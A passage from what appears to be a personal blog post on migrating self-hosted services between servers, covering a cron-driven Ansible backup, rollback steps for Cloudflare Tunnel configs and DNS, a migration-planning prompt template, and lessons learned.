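Setting up the automated backups can be as simple as a cron entry that reuses the existing playbook. A sketch (the schedule and log path are illustrative):

# crontab entry: nightly backup at 02:30 via the existing Ansible playbook
30 2 * * * cd /home/Development/Playbooks/SelfHosted_K_B_R && ansible-playbook -i inventory backup.yml >> /var/log/kbr-backup.log 2>&1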

Rollback Capabilities

The plan includes rollback procedures at multiple points:

  • Before Phase 8: Simply remove staging DNS from ai server; kbr server remains production
  • After Phase 9: Re-route production DNS back to kbr server, restore its original tunnel config

I backed up all cloudflared configs before modification, enabling quick restoration if needed.
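
A sketch of what the post-cutover rollback might look like, assuming the config backup sits next to the original and cloudflared runs as a systemd service (both assumptions on my part):

# Restore the kbr server's original tunnel config...
cp ~/.cloudflared/config.yml.bak ~/.cloudflared/config.yml
sudo systemctl restart cloudflared

# ...and point production DNS back at the kbr tunnel
cloudflared tunnel route dns <kbr-tunnel-id> kanban.myurl.io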

Lessons Learned

What Made This Migration Plannable

  • Existing documentation: Both systems had Operations directories with current state information
  • Ansible playbooks: Existing backup/restore automation provided a foundation
  • Docker containerization: Clean separation of services made migration straightforward
  • Cloudflare Tunnels: DNS changes don’t require firewall modifications

Prompt Engineering Insights

The planning session revealed that infrastructure migration requests benefit from explicit upfront information:

  • Migration type (full migration vs. backup copy)
  • Post-migration role for source system
  • DNS naming constraints (Cloudflare doesn’t allow underscores)
  • Storage preferences on target system
  • Links to official backup documentation
  • Specific data verification requirements
  • Service dependencies (API keys, credentials)
  • Rollback expectations

A structured prompt template capturing these elements can reduce planning clarification cycles significantly.
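
As a sketch, such a template might look like this. It's my own rough version, and the bracketed fields are placeholders:

Migration type: <full migration | backup copy>
Source system role after migration: <decommission | dev environment | ...>
DNS naming constraints: <e.g., Cloudflare doesn't allow underscores>
Target storage preference: <e.g., /opt/...>
Official backup documentation: <links for each service>
Data verification requirements: <baseline counts, write tests>
Service dependencies: <API keys, credentials>
Rollback expectations: <checkpoints, restore procedures>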

Conclusion

Migrating self-hosted services between servers doesn't have to be scary. I used agents to perform discovery, then executed this complex migration through a phased approach with staged DNS testing and clear rollback procedures.

The key principles:

  • Discover before planning: Understand the source and migration destination systems deeply
  • Validate backup procedures: Ensure they match official documentation
  • Stage before cutting over: Test with temporary DNS names first
  • Build in checkpoints: Go/No-Go decisions prevent premature transitions
  • Plan for rollback: Every change should be reversible
  • Verify with baseline counts: Compare before and after